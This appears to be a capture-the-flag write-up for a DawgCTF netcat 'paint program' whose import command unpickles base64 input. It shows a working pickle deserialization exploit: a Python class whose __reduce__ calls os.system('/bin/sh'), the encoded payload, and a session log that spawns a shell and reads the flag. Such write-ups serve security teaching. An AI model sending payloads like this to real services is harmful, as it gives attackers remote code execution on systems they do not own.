Skip to content

Latest commit

 

History

History
68 lines (56 loc) · 2.79 KB

writeup.md

File metadata and controls

68 lines (56 loc) · 2.79 KB

The service allows to display the canvas, set and clear particular pixel, import and exp[ort canvas.

$ nc umbccd.io 4200
Welcome to the Paint Program!
Paint us a new poster for the Jellyspotters 2021 convention. Make Kevin proud.
Type 'help' for help.
> help
Listing commands...
display             Display the canvas
clearall            Clear the canvas
set [row] [col]     Set a particular pixel
clear [row] [col]   Clear a particular pixel
export              Export the canvas state
import [canvas]     Import a previous canvas
exit                Quit the program

Tried to set then clear pixiel, didn't have any clue. Tried to export it shown a string which is base64 encoded canvas, import with invalid string as argument, it shown error, the error message disclosed how it encode/decode a canvas. Exported canvas indeed was a based64-encoded pickled canvas matrix, import takes a based64-encoded pickled canvas object as string.

$ nc umbccd.io 4200
Welcome to the Paint Program!
Paint us a new poster for the Jellyspotters 2021 convention. Make Kevin proud.
Type 'help' for help.
> import aaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Importing...
Traceback (most recent call last):
  File "/home/challuser/jellyspotters.py", line 67, in <module>
    imp = pickle.loads(base64.b64decode(split[1]))
  File "/usr/lib/python3.8/base64.py", line 87, in b64decode
    return binascii.a2b_base64(s)
binascii.Error: Invalid base64-encoded string: number of data characters (29) cannot be 1 more than a multiple of 4

This post introduced a way of pickle exploiting. It uses __reduce__ callback of particular object, while pickle/unpickle, the callback is called. So created a class with __reduce__ callback to launch /bin/sh, pickled the class and encoded with base64, when import it should spawn a shell.

class run(object):
  def __reduce__(self):
    import os
    return (os.system, ('/bin/sh',))

print(base64.b64encode(pickle.dumps(run())))

Imported the payload, it gave shell, the flag was in flag.txt.

$ nc umbccd.io 4200
Welcome to the Paint Program!
Paint us a new poster for the Jellyspotters 2021 convention. Make Kevin proud.
Type 'help' for help.
> import gASVIgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAcvYmluL3NolIWUUpQu
Importing...
/bin/sh: 0: can't access tty; job control turned off
$ ls
flag.txt  jellyspotters.py
$ cat flag.txt
DawgCTF{funn13st_s#$&_ive_3v3r_s33n}
$ 

Reference